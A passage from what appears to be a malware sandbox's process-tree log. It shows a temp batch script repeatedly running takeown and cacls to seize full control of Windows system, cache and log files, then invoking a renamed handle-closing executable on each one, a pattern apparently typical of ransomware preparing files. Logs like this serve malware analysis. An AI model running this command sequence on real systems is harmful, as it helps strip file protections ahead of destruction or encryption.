    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "refcount.ini" -nobanner
    3⤵
    PID:4880
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "refcount.ini" -nobanner
      4⤵
      PID:4104
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab""
  2⤵
  PID:2216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab" /E /G Admin:F /C
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab"
    3⤵
    - Modifies file permissions
    PID:4980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "cab1.cab" -nobanner
    3⤵
    PID:4728
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "cab1.cab" -nobanner
      4⤵
      PID:5108
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl""
  2⤵
  PID:4124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" /E /G Admin:F /C
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl"
    3⤵
    - Modifies file permissions
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
    3⤵
    PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
      4⤵
      PID:3880
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl""
  2⤵
  PID:2560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" /E /G Admin:F /C
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl"
    3⤵
    - Modifies file permissions
    PID:4236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
    3⤵
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
      4⤵
      PID:3620
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\cab1.cab""
  2⤵
  PID:288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\cab1.cab" /E /G Admin:F /C
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\cab1.cab"
    3⤵
    - Modifies file permissions
    PID:4368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "cab1.cab" -nobanner
    3⤵
    PID:4892
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "cab1.cab" -nobanner
      4⤵
      PID:4392
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:4360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1616
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "background.png" -nobanner
      4⤵
      PID:4192
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:4312
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    PID:4620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:5016
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:4348
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""
  2⤵
  PID:4504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"
    3⤵
    - Modifies file permissions
    PID:4300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
    3⤵
    PID:4120
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
      4⤵
      PID:4664
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""
  2⤵
  PID:2212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"
    3⤵
    - Modifies file permissions
    PID:4316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
    3⤵
    PID:4636
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
      4⤵
      PID:4328
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""
  2⤵
  PID:4796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
    3⤵
    PID:4776
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
      4⤵
      PID:4920
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:4880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:3416
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:4688
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl""
  2⤵
  PID:4728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" /E /G Admin:F /C
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl"
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
    3⤵
    PID:4956
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
      4⤵
      PID:4960
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl""
  2⤵
  PID:3880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" /E /G Admin:F /C
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl"
    3⤵
    PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
    3⤵
    PID:4780
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
      4⤵
      PID:2752
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab""
  2⤵
  PID:5096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab" /E /G Admin:F /C
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab"
    3⤵
    PID:4152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "cab1.cab" -nobanner
    3⤵
    PID:4260
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "cab1.cab" -nobanner
      4⤵
      PID:4380
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat""
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat" /E /G Admin:F /C
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat"
    3⤵
    - Modifies file permissions
    PID:4552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
    3⤵
    PID:2088
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
      4⤵
      PID:4308
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.f0076c20-f6bd-4de8-a38a-66193a185b1b.1.etl""
  2⤵
  PID:284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.f0076c20-f6bd-4de8-a38a-66193a185b1b.1.etl" /E /G Admin:F /C
    3⤵
    PID:776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.f0076c20-f6bd-4de8-a38a-66193a185b1b.1.etl"
    3⤵
    PID:4100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MoUsoCoreWorker.f0076c20-f6bd-4de8-a38a-66193a185b1b.1.etl" -nobanner
    3⤵
    PID:4548
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MoUsoCoreWorker.f0076c20-f6bd-4de8-a38a-66193a185b1b.1.etl" -nobanner
      4⤵
      PID:4608
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1""
  2⤵
  PID:4348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1"
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "settings.dat.LOG1" -nobanner
    3⤵
    PID:4616
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "settings.dat.LOG1" -nobanner
      4⤵
      PID:4268
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:4160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:3596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:3444
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:4628
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat""
  2⤵
  PID:4888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat" /E /G Admin:F /C
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat"
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
    3⤵
    PID:4456
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
      4⤵
      PID:1136
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.f0076c20-f6bd-4de8-a38a-66193a185b1b.1.etl""
  2⤵
  PID:2392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.f0076c20-f6bd-4de8-a38a-66193a185b1b.1.etl" /E /G Admin:F /C
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.f0076c20-f6bd-4de8-a38a-66193a185b1b.1.etl"
    3⤵
    - Modifies file permissions
    PID:4700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MoUsoCoreWorker.f0076c20-f6bd-4de8-a38a-66193a185b1b.1.etl" -nobanner
    3⤵
    PID:4452
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MoUsoCoreWorker.f0076c20-f6bd-4de8-a38a-66193a185b1b.1.etl" -nobanner
      4⤵
      PID:880
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:4560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:4900
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:2940
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:1240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4912
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:560
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""
  2⤵
  PID:3656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"
    3⤵
    - Modifies file permissions
    PID:2408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
    3⤵
    PID:5032
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
      4⤵
      PID:4712
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\takeown.exe
